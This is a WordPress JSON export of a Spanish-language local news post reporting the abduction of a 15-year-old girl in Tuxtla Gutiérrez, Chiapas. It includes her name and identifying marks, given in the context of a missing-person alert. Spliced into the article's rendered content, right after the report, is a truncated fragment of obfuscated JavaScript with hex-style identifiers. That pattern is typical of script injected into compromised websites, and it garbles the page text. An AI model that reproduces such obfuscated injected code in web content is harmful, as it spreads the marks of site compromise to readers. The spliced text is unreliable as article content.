{"id":7668,"date":"2022-12-29T00:12:00","date_gmt":"2022-12-29T00:12:00","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=7668"},"modified":"2022-12-29T00:12:01","modified_gmt":"2022-12-29T00:12:01","slug":"levantan-a-jovencita-en-teran","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=7668","title":{"rendered":"Levantan a jovencita en Ter\u00e1n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"930\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/FB_IMG_1672272672078.jpg\" alt=\"\" class=\"wp-image-7669\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/FB_IMG_1672272672078.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/FB_IMG_1672272672078-232x300.jpg 232w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 28 de diciembre del 2022. Tuxtla Guti\u00e9rrez.- Este martes por la noche se report\u00f3 un levant\u00f3n contra una jovencita en la delegaci\u00f3n Ter\u00e1n de Tuxtla Guti\u00e9rrez.De acuerdo con los reportes oficiales, fueron los mismos vecinos los que reportaron este hecho.En el lugar los familiares de Raquel Sara\u00ed de 15 a\u00f1os de edad indicaron que, la joven hab\u00eda salido para cerrar un paso de agua. En ese momento, hombres la tomaron por la fuerza y la metieron a un veh\u00edculo March Nissan con logotipos de color amarillo tipo taxi y escaparon rumbo a la zona Oriente de Tuxtla.Testigos informaron que, la joven cuenta con un tatuaje en la mano derecha con la leyenda &#8220;Scream&#8221; y una cicatriz en la espinilla izquierda.Por el presunto delito de secuestro se activ\u00f3 el protocolo Alba de la Fiscal\u00eda General del Estado<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 28 de diciembre del 2022. Tuxtla Guti\u00e9rrez.- Este martes por la noche se report\u00f3 un levant\u00f3n contra una jovencita en la delegaci\u00f3n Ter\u00e1n de Tuxtla Guti\u00e9rrez.De acuerdo con los reportes oficiales, fueron los mismos vecinos los que reportaron este hecho.En el lugar los familiares de Raquel Sara\u00ed de 15 a\u00f1os de edad &hellip;<\/p>\n","protected":false},"author":2,"featured_media":7669,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-7668","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7668","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7668"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7668\/revisions"}],"predecessor-version":[{"id":7670,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7668\/revisions\/7670"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/7669"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7668"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7668"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7668"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}